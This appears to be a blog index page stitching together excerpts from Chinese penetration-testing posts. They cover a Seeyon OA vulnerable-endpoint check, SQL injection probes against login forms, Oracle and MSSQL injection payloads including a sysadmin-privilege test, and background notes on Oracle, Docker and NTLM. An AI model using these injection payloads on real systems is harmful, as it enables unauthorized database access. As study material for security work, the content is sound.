0x00 影响版本

• 致远A8-V5协同管理软件 V6.1sp1
• 致远A8+协同管理软件 V7.0、V7.0sp1、V7.0sp2、V7.0sp3
• 致远A8+协同管理软件 V7.1

0x01 查看接口看是否存在漏洞

如果查看 "seeyon/htmlofficeservlet" 接口，出现如下内容则表示存在漏洞

0x00 目标情况

• 只有一个登录框

0x01 发现注入

简单看了下登陆框，可以爆破用户名

加单引号后报错，试了试 and 1=1 确实存在注入

0x01 进一步测试

尝试得到数据版本: admin' and @@version=1--

0x00 目标情况

• 一个web站点111.*.*.63，只有一个登陆框，测试了没有注入，没有弱口令
• 扫描了全端口，没有发现什么有用的信息

0x01 发现注入

当时是查看网页源代码，有两个可疑接口，一个是初始化密码借口，访问返回空白页面，没有什么用

0x00 判断数据库类型

• Oracle有一些自带的表：dual、user_tables

  • id=45 and (select count(*) from user_tables)>0--
  • id=45 and (select count(*) from dual)>0--

• 利用自带的一些函数：譬如utl_http.request 这些

  more...

0x00 关于Oracle

• 完整的Oracle数据库通常由两部分组成：Oracle数据库和数据库实例。
• 数据库是一系列物理文件的集合（数据文件，控制文件，联机日志，参数文件等）
• Oracle数据库实例则是一组Oracle后台进程/线程以及在服务器分配的共享内存区
• 关于部分视图
  • DBA/ALL/USER/V_$/GV_$/SESSION/INDEX开头的绝大部分都是视图
  • DBA_TABLES意为DBA拥有的或可以访问的所有的关系表。
  • ALL_TABLES意为某一用户拥有的或有权限访问的所有的关系表。
  • USER_TABLES意为某一用户所拥有的所有的关系表。
  • 当某一用户本身就为数据库DBA时，DBA_TABLES与ALL_TABLES等价。
  • DBA_TABLES >= ALL_TABLES >= USER_TABLES

0x01 关于实例

• 在启动Oracle数据库服务器时，实际上是在服务器的内存中创建一个Oracle实例（即在服务器内存中分配共享内存并创建相关的后台内存）
• 我们访问Oracle都是访问一个实例，通过Oracle数据库实例来访问和控制磁盘中的数据文件
• Oracle实例如果关联了数据库文件，就是可以访问的，如果没有，就会得到实例不可用的错误
• 实例名指的是用于响应某个数据库操作的数据库管理系统的名称，它同时也叫SID，连接数据库时就会用到这个SID，如：jdbc:oracle:thin:@localhost:1521:orcl（orcl就为数据库实例名）

0x02 关于表空间(可以理解为mysql中的数据库)

• Oracle数据库是通过表空间来存储物理表的，一个数据库实例可以有N个表空间，一个表空间下可以有N张表。
• 用户和表空间是多对多的关系，但是一般创建用户时会指定一个默认表空间。
• 表空间是数据库中最大的逻辑单位，一个表空间可以包含多个数据文件，而一个数据文件只能隶属一个表空间。

0x03 搭建Oracle环境

使用docker拉取Oracle数据库并且运行

0x00 验证码前端验证

需要测试一个网站，刚开始看到网站时感觉希望不大，因为验证码是需要拖动的，这也就意味着很大可能没办法爆破，另一方面是都用这种验证码了，安全做的能很差劲吗？果然，试了admin、123456之类的都不行

0x00 实现功能

使用docker-compose构造LAMP环境，其中mysql数据库、mysql配置文件、网站文件均持久化存储到本机。

0x00 关于docker compose

可以把docker-compose当作docker命令的封装，它是一个用来把 docker 自动化的东西，docker-compose可以一次性管理多个容器，通常用于需要多个容器相互配合来完成某项任务的场景。

0x00 一些概念

• Windows 认证协议

  分为：基于 NTLM 的认证和基于 kerberos 的认证

• 什么是 NTLM Hash？

  早期 IBM 设计的 LM Hash 算法存在弱点，微软在保持向后兼容性的同时提出了自己的挑战响应机制，即 NTLM Hash

  more...

0x00 基础信息探测

@@VERSION,@@SERVERNAME,@@SERVICENAME;
--Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64) 
--WIN-2008
--MSSQLSERVER

USER,CURRENT_USER,SESSION_USER,SYSTEM_USER;
--dbo
--dbo
--dbo
--sa

USER_NAME(),HOST_NAME(),HOST_ID(),SUSER_NAME();
--dbo
--wyb
--46530
--sa

USER_ID(),USER_SID();
--1
--<01>

ORIGINAL_LOGIN();
--sa

0x01 UNION query & error-based 注入

• 判断存在注入

and 1=1/and 1=2

select * from msg where id=1 and 11=(select case when(1=1) then 11 else 2 end);

select * from msg where id=1 and 11=(select case when(1=2) then 11 else 2 end);

• 判断是否为sa权限

select name from msg where id=1 and 1=convert(int,(select is_srvrolemember('sysadmin')));